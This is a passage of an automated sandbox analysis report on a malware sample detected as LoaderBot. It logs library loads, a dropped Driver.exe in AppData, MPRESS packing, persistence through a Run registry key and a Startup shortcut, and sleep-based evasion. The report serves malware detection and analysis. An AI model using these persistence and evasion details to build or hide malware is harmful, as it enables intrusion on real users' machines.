                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: powrprof.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: napinsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: pnrpnsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: wshbth.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: nlaapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: winrnr.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wersvc.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: windowsperformancerecordercontrol.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: weretw.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wer.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: faultrep.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dbghelp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dbgcore.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wer.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: powrprof.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: napinsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: pnrpnsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: wshbth.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: nlaapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: winrnr.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: powrprof.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: napinsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: pnrpnsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: wshbth.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: nlaapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: winrnr.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: kWYLtJ0Cn1.exeStatic file information: File size 4819968 > 1048576
                    Source: kWYLtJ0Cn1.exeStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x3f9a00
                    Source: kWYLtJ0Cn1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                    Source: kWYLtJ0Cn1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                    Source: kWYLtJ0Cn1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                    Source: kWYLtJ0Cn1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: kWYLtJ0Cn1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                    Source: kWYLtJ0Cn1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                    Source: kWYLtJ0Cn1.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                    Source: kWYLtJ0Cn1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: C:\9h4bqyhzw0\output.pdb source: kWYLtJ0Cn1.exe
                    Source: Binary string: C:\9h4bqyhzw0\output.pdb. source: kWYLtJ0Cn1.exe
                    Source: kWYLtJ0Cn1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                    Source: kWYLtJ0Cn1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                    Source: kWYLtJ0Cn1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                    Source: kWYLtJ0Cn1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                    Source: kWYLtJ0Cn1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                    Data Obfuscation

                    barindex
                    Detected unpacking (changes PE section rights)
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeUnpacked PE file: 2.2.Driver.exe.140000000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeUnpacked PE file: 20.2.Driver.exe.140000000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
                    Yara detected LoaderBot
                    Source: Yara matchFile source: 0.2.kWYLtJ0Cn1.exe.ffcbc0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.kWYLtJ0Cn1.exe.f60000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000001.00000002.4118537501.000000000067C000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1675093789.000000000137E000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: kWYLtJ0Cn1.exe PID: 7312, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7368, type: MEMORYSTR
                    Source: initial sampleStatic PE information: section where entry point is pointing to: .MPRESS2
                    Source: kWYLtJ0Cn1.exeStatic PE information: real checksum: 0x0 should be: 0x4a26f7
                    Source: Driver.exe.1.drStatic PE information: real checksum: 0x3f8bb4 should be: 0x3fb52d
                    Source: Driver.exe.1.drStatic PE information: section name: .MPRESS1
                    Source: Driver.exe.1.drStatic PE information: section name: .MPRESS2
                    Source: C:\Users\user\Desktop\kWYLtJ0Cn1.exeCode function: 0_2_00F8E1C4 push ecx; ret 0_2_00F8E1D7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.urlJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.urlJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DriverJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DriverJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 1210000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 2E80000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 2CC0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 5197Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7456Thread sleep count: 5197 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7456Thread sleep time: -5197000s >= -30000sJump to behavior
